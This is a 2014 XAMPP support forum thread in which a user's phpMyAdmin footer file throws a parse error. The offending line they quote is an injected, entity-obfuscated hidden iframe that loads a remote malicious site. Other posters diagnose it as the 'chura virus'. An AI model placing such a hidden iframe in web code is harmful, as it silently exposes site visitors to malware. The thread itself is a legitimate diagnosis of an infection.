Parse error: syntax error

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Parse error: syntax error

Postby tafsirul » 11. January 2014 07:23

This is the first time I'm using xampp and when I try to access localhost/phpmyadmin/ it shows an error message in browser like this:

Parse error: syntax error, unexpected 'http' (T_STRING) in F:\xampp\phpMyAdmin\libraries\Footer.class.php on line 281

Line 281 looks like this:

$retval .= "<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Please help!
Last edited by tafsirul on 12. January 2014 07:51, edited 1 time in total.
tafsirul
 
Posts: 3
Joined: 11. January 2014 07:12
Operating System: Windows 7

Re: Parse error: syntax error

Postby JJ_Tagy » 11. January 2014 17:14

Did you change something in phpmyadmin? Are you running the stock version that comes with XAMPP or did you try to update?
JJ_Tagy
 
Posts: 678
Joined: 30. January 2012 13:44
Operating System: Windows 10 Pro x64

Re: Parse error: syntax error

Postby tafsirul » 12. January 2014 05:19

No I've not changed anything in phpmyadmin. I just clicked phpmyadmin in my browser and the error occurred.

No, I've not updated it online. It's the downloaded version (1.8.3).
tafsirul
 
Posts: 3
Joined: 11. January 2014 07:12
Operating System: Windows 7

Re: Parse error: syntax error

Postby JJ_Tagy » 12. January 2014 20:49

Looks like spyware/adware to me. That definitely does not belong there.
JJ_Tagy
 
Posts: 678
Joined: 30. January 2012 13:44
Operating System: Windows 10 Pro x64

Re: Parse error: syntax error

Postby Altrea » 12. January 2014 21:41

You can find a hundred of thousand of hits on google for that virus (simply search for chura virus).
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 8294
Joined: 17. August 2009 13:05
XAMPP version: several
Operating System: Windows 10 Pro x64

Re: Parse error: syntax error

Postby tafsirul » 13. January 2014 08:51

Yes it was infected by 'chura virus' and I've solved the virus problem after Windows setup. Thanks!
tafsirul
 
Posts: 3
Joined: 11. January 2014 07:12
Operating System: Windows 7


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 49 guests